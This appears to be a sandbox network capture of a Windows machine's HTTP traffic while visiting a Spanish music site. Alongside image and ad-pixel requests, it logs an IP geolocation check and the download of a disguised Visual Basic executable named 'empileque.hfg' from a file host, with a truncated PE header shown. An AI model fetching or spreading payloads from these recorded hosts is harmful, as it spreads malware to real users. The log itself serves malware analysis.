Host: api.wipmania.com

HTTP/1.1 200 OK

Server: nginx

Date: Mon, 21 Apr 2014 11:57:00 GMT

Content-Type: text/html

Content-Length: 21

Connection: keep-alive

Keep-Alive: timeout=20

193.138.244.231<br>UAHTTP/1.1 200 OK..Server: nginx..Date: Mon, 21 Apr 2014 11:57:00 GMT..Content-Type: text/html..Content-Length: 21..Connection: keep-alive..Keep-Alive: timeout=20..193.138.244.231<br>UA..

GET / HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: mi.2papa.us

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:26 GMT

Content-Type: text/html

Content-Length: 2723

Last-Modified: Thu, 03 Apr 2014 17:51:39 GMT

Connection: keep-alive

ETag: "533d9fab-aa3"

Accept-Ranges: bytes

<<

<<< skipped >>>

GET /2454.html?s=300x250 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: u.pub-fit.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT

ETag: f0908d483f8ef53a51e6767d7fecbe97

X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1

Accept-Ranges: bytes

X-Timestamp: 1392737142.11331

Content-Type: text/html

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 382

Cache-Control: public, max-age=673

Expires: Mon, 21 Apr 2014 12:08:41 GMT

Date: Mon, 21 Apr 2014 11:57:28 GMT

Connection: keep-alive

..........m.Qo. ..........M...N..j.C.*.....(\l*...W{...p..a........\.`...'.G.ql..:.jc.s?d.2.`<..}:A..x.?.[6[.{..8Kjf.k...%....}.el.....%9...V&.5g...N....k..S..A.............?...P...........%..F.....t{}Kn../.o...6U. .EQH..(...r].q-..Q....F..*.'T.<...Ga...._>.......z....7..:.. |.t.7x.z3@ j._....,$...F.i.....S....7...&.;...!...n...-....:E.D..qa..eF^......L.`..IDY.9..M....4...n......HTTP/1.1 200 OK..Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT..ETag: f0908d483f8ef53a51e6767d7fecbe97..X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1..Accept-Ranges: bytes..X-Timestamp: 1392737142.11331..Content-Type: text/html..Vary: Accept-Encoding..Content-Encoding: gzip..Content-Length: 382..Cache-Control: public, max-age=673..Expires: Mon, 21 Apr 2014 12:08:41 GMT..Date: Mon, 21 Apr 2014 11:57:28 GMT..Connection: keep-alive............m.Qo. ..........M...N..j.C.*.....(\l*...W{...p..a........\.`...'.G.ql..:.jc.s?d.2.`<..}:A..x.?.[6[.{..8Kjf.k...%....}.el.....%9...V&.5g...N....k..S..A.............?...P...........%..F.....t{}Kn../.o...6U. .EQH..(...r].q-..Q....F..*.'T.<...Ga...._>.......z....7..:.. |.t.7x.z3@ j._....,$...F.i.....S....7...&.;...!...n...-....:E.D..qa..eF^......L.`..IDY.9..M....4...n........

<<

<<< skipped >>>

GET /wj53lrzxv7lg/bg4jdeppib94ych/empileque.hfg HTTP/1.1

User-Agent: Mozilla/4.0

Host: download627.mediafire.com

Connection: Keep-Alive

Cookie: ukey=d744vnx8vv7np87ybpq2qnf92ov8hquc

HTTP/1.1 200 OK

Server: LRBD-bigdownload-

Date: Mon, 21 Apr 2014 11:57:18 GMT

Connection: close

Accept-Ranges: bytes

Content-transfer-encoding: binary

Content-Length: 160368

Content-Disposition: attachment; filename="empileque.hfg"

Content-Type: application/x-dosexec

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].......................p...............rich............................PE..L...h........................ ....................@..................................U..........................................$........................4...$...$...................$...............................................................text............................... ..`.data....!..........................@....rsrc.p."...........................@..@l.[J.............SVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

<<

<<< skipped >>>

GET /small/05/567.png HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: widgets.amung.us

HTTP/1.1 200 OK

Server: nginx/1.2.4

Date: Mon, 21 Apr 2014 11:57:47 GMT

Content-Type: image/png

Content-Length: 324

Last-Modified: Sun, 13 Jun 2010 09:48:29 GMT

Connection: keep-alive

Expires: Wed, 21 May 2014 11:57:47 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

.PNG........IHDR...P.........D......9PLTE.bM.nX.82.G:................zc.....z.UC..n.'-00/...555...........IDAT8...Y.. .D.....p..v..P5...X1V>.....Y.J.<M....Gb...]..G....v.LL..1;?..D........_.>....[.V..R... .G`....E....0..... ...LG.%...k.Q..C..X..*F2.......Y...3....a.e.D..-.Q.R.W......a...;..-..

GET /Imagenes/i.f06.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:29 GMT

Content-Type: image/gif

Content-Length: 277

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-115"

Accept-Ranges: bytes

GIF89a.......................................................................................................!.......,...........`. .e.h..l..p,.....3T|....pH,...$r..Dv..tJ.Zy.....z..I.L.....y.n....|.....|T....C.}......~...s...k...`...W...R...G....I....E....A................!.;....

GET /Imagenes/i_15.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:29 GMT

Content-Type: image/gif

Content-Length: 156

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-9c"

Accept-Ranges: bytes

GIF89a.......................................................................................................!.......,........... $(A...C@..6....0KHr..-=!.;....

GET /Imagenes/i_58.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:30 GMT

Content-Type: image/gif

Content-Length: 228

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-e4"

Accept-Ranges: bytes

GIF89a.......................................................................................................!.......,..........a`.a$....J....$OE]dx.qVo.@.b.8...d...\...t..F.X.c..x .p#@.?...z.h;..8aN.....>....................!.;....

GET /Imagenes/lyrics_ico.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:30 GMT

Content-Type: image/gif

Content-Length: 1436

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-59c"

Accept-Ranges: bytes

GIF89aB.........hgg|{{......rqq.................................................................~...MLM...........................211....................................<;?...............jlj...........................oqodfk~~}...FFF............^^`..................::@777...... **......|}|.........ijl...887~~....QRQ||.wwwrrr...888........................GFKXZ[....................................>>>...EEE~}..........776.........)))......`af......///.........=>=.....................{{{......UVUfcg121...:::......qqr........................................................................................................................................................................................................................................................................!.......,....B.......k..Hp.....*\..a...lI.H.....3f.. ......Pp.d..W..4.....0c.T.b...)P......F?........H.*-..E.Z#0(.E.*-6.d..4....`....U....8.Z..U F.L..b.-.......B...z98X...... ...D.$M...A.......kXaK.....(...O...% .P.3....x. AU...*........SI.@.8.%&.`9qb...o..'..@.1...1. ........A ......0..=q....Ou...@....Q.......J.!X.@.....x..gAl!.0....'. .f.."fd..)U..I....!....@..x.J..2.../2...4...D...#*.|..!.....s..#*,4.#........(.....F!.d..*.|...cJ...h.i..:.Q. g..../4p&........)..{..@..H...."j.........AG..P....:.A..v....&0@.0.b...R....h.....yR@...j........0......I.4.q..r.q...6....F...8.0@.%..m Yl.....................J...@.D.8@.@.Lp...N.....,pA.80.F.'....7.......;....

<<

<<< skipped >>>

GET /Imagenes/videos_ico.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:30 GMT

Content-Type: image/gif

Content-Length: 1522

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-5f2"

Accept-Ranges: bytes

GIF89aB.....................|{{.....................rqq???...............888.........|{z.....................666yxx............, ............OOO...BBB@@@```..............................`aa...988.........,,,...:::-,,;::100000FFE...999///...655*))...yyx.........||{MNM``_kkk...pqp.....................XZY...544...xww...VWVZ\Z.........OQP\\[...=<<......pppacbUVUUUU...wwv...ccbZZZWWW...IIIYZY433...............tvt............]^]ikj566VUU......KKK...||z.........uut............qrq...]]\......$$$VVVglieed...npn......}}}ded...PPO{zzFFF............jjj[[[...WXWVVUccc......;<<......bcb...|}|...}|{ege...---...`a`MMM......RRR.........==<...gggaaa...utt555RTR~}|...yyyabb...hgg...............................................................................................................!.......,....B..........H......*\8p...."J.H.....1F... ...*..I....(S.TYA....w..0)...8o....\.?....J........1.....z.*.,..8V*92uJG,hF.H.F....h..=[....6.y ..U.#...q....Kg@P.5B..... ^.....,.m.....X........9..L{!A.i...........O..@....thUI.f..>.V.h.@.!Y.l _.|.,...K....u5.4.b...."~x8.`E.. D9. @`......L.V...c..M@B.A~.a .@~.Yg........,....(........-P`..."....40.|...... ..... ...<.......6,r.#u......`..2...I.m....B..#.Nh........U.`.............40..O..@D.....r.S.6&.1..[$.d n.i.....M.1`.'..0.'...Y.6.d.@.1.iiD.d.).....3u.../I8....f..}...A..x.Af..4..."0p.67.`.....@...j,9., ...@..'w....8Pr.. .Q...v....b....h.......6.t @......_..-....A.....'.<2E5....#J,....7....G.o.Zd..7..3N#AH...d...!.dl..(..........D..84.l..8....<....?Ht..$0d..H.p...5.

<<

<<< skipped >>>

GET /Imagenes/twitter.png HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:30 GMT

Content-Type: image/png

Content-Length: 608

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-260"

Accept-Ranges: bytes

.PNG........IHDR................a....sBIT....|.d.....pHYs...........~.....tEXtCreation Time.6/24/09..k.....tEXtSoftware.Adobe Fireworks CS4........IDAT8...Kk.A....]:;n4...6!.z.%...O.............`.$.. .@B.b|..2.>`......2..6b..n..~..j:x../Y.u.,... ..*hPj....l......X..H..V.mP.R.Za?IN#......).......o.c.y.G...x.z".(7..@..XJo...L......(7..a...d......e..dX.N.U*....k......7n9..eV`.$...Tk7<...]<|R.fV.*p.\....../w...........c ..d.>.ia..!./O..M..`.....:.!............|.........{.....?.....C..oc.......{.c<"..................`....I..2....v..k.LD.m.17...Z.:P..K....:..a7.i...P.t....J.....sUC......7*.a8.;^....IEND.B`.....

GET /Imagenes/facebook.png HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:30 GMT

Content-Type: image/png

Content-Length: 502

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-1f6"

Accept-Ranges: bytes

.PNG........IHDR................a....sBIT....|.d.....pHYs...........~.....tEXtCreation Time.6/24/09..k.....tEXtSoftware.Adobe Fireworks CS4.......OIDAT8....J.A..............k...)..S..&E,.G.7...A.l..Z..W.1.....a...c...Av7....;.33..rS.f..X6&......5.....v...R*.l....c.....P.JO....$.r.....5........<..../... ah&..$...m......g...&.&...X.....p.X...$........h2...n.#.;...`......u._.W....p..3..W.I.ur..x.:...0.4.%>.(..D.$...|*..=...-,.....N'..^0<.=...KLPk......<.7....5..s^..<.cm.v....Z:...............IEND.B`.....

GET /Imagenes/i_02.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:31 GMT

Content-Type: image/gif

Content-Length: 7141

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-1be5"

Accept-Ranges: bytes

GIF89a..B...............................e..b...........m........r.....x........w..o.....y....#..(~.&..1..7..8..?..C..Y..b..e..|....................................|..x..h..}..j..m.....q.......*..'..0..-{.)..@..I..M..R..F..K..V..U..R..Y..M..\..T..\..b..h..b..X..j..a..i..q..p..y..v.....v..|............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,......B........H......*\......#J..P....3j...... C..I.......\.....0c..I....8s.......@........H.*].....P.J.J....N.i......`...K....h..] ....p...K....x........v...L...... ^......#K.......3k.......C..M.......^......c..M.....s.................. _.......K.N......i...........O......._/~.......O......7k&L..f..(.............6.`........c....g.0.J8a-.Z.....h..&.... ..b.,..".1.8..8.x.7..2.'..".76.h..H"..0=...'P.9d.IV.c;Xf..5..........E..%.%Z.e;].I.;\.)..rZs.-.t.....B.7..)....*.;<..I'..b..}..........fjM5<...'..9..b..M5.d.....YM5...*........(.C'..:.... .....k..D..........jk'..bm..D.f/.v.I/......B.....j...(.k'.|.k...[.'.....J...... .4..L.5.."K#.....J. 1.Q..I#.k...Zh../.\sp....q#.............K#.^../,....<...-......*`s.9....-...(..aC.TWM..S...&a

<<

<<< skipped >>>

GET /Imagenes/i_08.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:31 GMT

Content-Type: image/gif

Content-Length: 70

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-46"

Accept-Ranges: bytes

GIF89a...............................!.......,............J,..H9j.%..;....

GET /Imagenes/-4524f.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:31 GMT

Content-Type: image/gif

Content-Length: 110

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-6e"

Accept-Ranges: bytes

GIF89a.............222.........@@@===........................!.......,...........0.... ....`(.di...q.g`...K..;....

GET /Imagenes/ii_14.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:31 GMT

Content-Type: image/gif

Content-Length: 176

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-b0"

Accept-Ranges: bytes

GIF89a..0..........'''RRRQQQ///ZZZ..................%%%...000.........___....................................!.......,......0...- ....Q(.().8-5.Bl.x..|....pH,..1B..h%.........;....

GET /Imagenes/vineta.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:31 GMT

Content-Type: image/gif

Content-Length: 87

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-57"

Accept-Ranges: bytes

GIF89a...............................!.......,...........8...P.1..T...f.75.E9..B...S..;....

GET /Imagenes/fondo_icos.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:31 GMT

Content-Type: image/gif

Content-Length: 153

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-99"

Accept-Ranges: bytes

GIF89a.......................................................................................................!.......,...........`$.d9.@P...<Os,..@..C!.;....

GET /static.img/img/i-21.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:32 GMT

Content-Type: image/gif

Content-Length: 63

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-3f"

Accept-Ranges: bytes

GIF89a...............................!.......,...........h2E..;....

GET /Imagenes/i_82.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:32 GMT

Content-Type: image/gif

Content-Length: 354

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-162"

Accept-Ranges: bytes

GIF89a.......................................................................................................................................................................................................!.......,...........@.i8..MFb.xD6..#t..J..OS{.f.MHi<............(....w;^....}. ................$...$...................................&.....C....A.;....

GET /Imagenes/i_86.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:32 GMT

Content-Type: image/gif

Content-Length: 355

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-163"

Accept-Ranges: bytes

GIF89a.......................................................................................................................................................................................................!.......,.............PX.....Q9d..Hg2J.Z..!..5v.\.X...Ef..,"...7)....w;~$...}.!"....... ... ... ...%...%.....................................'....BA.;....

GET / HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

Cookie: __utma=127640345.1684967166.1398081329.1398081329.1398081329.1; __utmb=127640345.1.10.1398081329; __utmc=127640345; __utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:43 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 130866

Last-Modified: Mon, 07 Apr 2014 17:00:48 GMT

Connection: keep-alive

ETag: "5342d9c0-1ff32"

Accept-Ranges: bytes

.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">. <head>. <title>Musica Online</title>. <meta name='title' content="Musica Online">. <meta name='description' content="Musica Online tiene un gran repertorio de musica en linea, disfruta de la canciones que mas suenan en la disco, mira los videos y letras de tus canciones favoritas">. <meta name='keywords' content="MUSICA ONLINE,ESCUCHAR MUSICA, MUSICA EN LINEA">. <meta name="robots" content="index, follow"/>. <meta name="author" content="Musica Online"/>. <meta name="copyright" content="Musica Online 2012 Derechos Reservados"/>. <meta http-equiv="Content-Language" content="es"/>. <meta name="revisit" content="1 days"/>. <meta NAME="googlebot" content="index, follow" />. <base href="hXXp://esmusicon.com/" />. <META HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />. <link href="./Estilos/CSS.Sitio.css" rel="stylesheet" type="text/css" />. <link href="./Estilos/CSS.Panel.css" rel="stylesheet" type="text/css" />. <script type="text/javascript" src="Js/Principal.js"></script&g

<<

<<< skipped >>>

GET /pixel.gif?id=5397210&r=0.8804630965534756&u=http://esmusicon.com/Poemas/ HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: px.pub-fit.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT

ETag: 325472601571f31e1bf00674c368d335

Content-Length: 43

Accept-Ranges: bytes

X-Timestamp: 1363188507.50732

Content-Type: image/gif

X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1

Cache-Control: public, max-age=819

Expires: Mon, 21 Apr 2014 12:11:08 GMT

Date: Mon, 21 Apr 2014 11:57:29 GMT

Connection: keep-alive

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT..ETag: 325472601571f31e1bf00674c368d335..Content-Length: 43..Accept-Ranges: bytes..X-Timestamp: 1363188507.50732..Content-Type: image/gif..X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1..Cache-Control: public, max-age=819..Expires: Mon, 21 Apr 2014 12:11:08 GMT..Date: Mon, 21 Apr 2014 11:57:29 GMT..Connection: keep-alive..GIF89a.............!.......,...........D..;....

GET /pixel.gif?id=5397210&r=0.14030898417391835&u=http://esmusicon.com/ HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: px.pub-fit.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT

ETag: 325472601571f31e1bf00674c368d335

Content-Length: 43

Accept-Ranges: bytes

X-Timestamp: 1363188507.50732

Content-Type: image/gif

X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1

Cache-Control: public, max-age=805

Expires: Mon, 21 Apr 2014 12:11:08 GMT

Date: Mon, 21 Apr 2014 11:57:43 GMT

Connection: keep-alive

GIF89a.............!.......,...........D..;....

GET /pixel.gif?id=5397210&r=0.0038873341277975703&u=http://esmusicon.com/ HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: px.pub-fit.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT

ETag: 325472601571f31e1bf00674c368d335

Content-Length: 43

Accept-Ranges: bytes

X-Timestamp: 1363188507.50732

Content-Type: image/gif

X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1

Cache-Control: public, max-age=805

Expires: Mon, 21 Apr 2014 12:11:08 GMT

Date: Mon, 21 Apr 2014 11:57:43 GMT

Connection: keep-alive

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT..ETag: 325472601571f31e1bf00674c368d335..Content-Length: 43..Accept-Ranges: bytes..X-Timestamp: 1363188507.50732..Content-Type: image/gif..X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1..Cache-Control: public, max-age=805..Expires: Mon, 21 Apr 2014 12:11:08 GMT..Date: Mon, 21 Apr 2014 11:57:43 GMT..Connection: keep-alive..GIF89a.............!.......,...........D..;..

GET /pixel.gif?id=5397210&r=0.7235460356268475&u=http://esmusicon.com/Poemas/ HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: px.pub-fit.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT

ETag: 325472601571f31e1bf00674c368d335

Content-Length: 43

Accept-Ranges: bytes

X-Timestamp: 1363188507.50732

Content-Type: image/gif

X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1

Cache-Control: public, max-age=819

Expires: Mon, 21 Apr 2014 12:11:08 GMT

Date: Mon, 21 Apr 2014 11:57:29 GMT

Connection: keep-alive

GIF89a.............!.......,...........D..;....

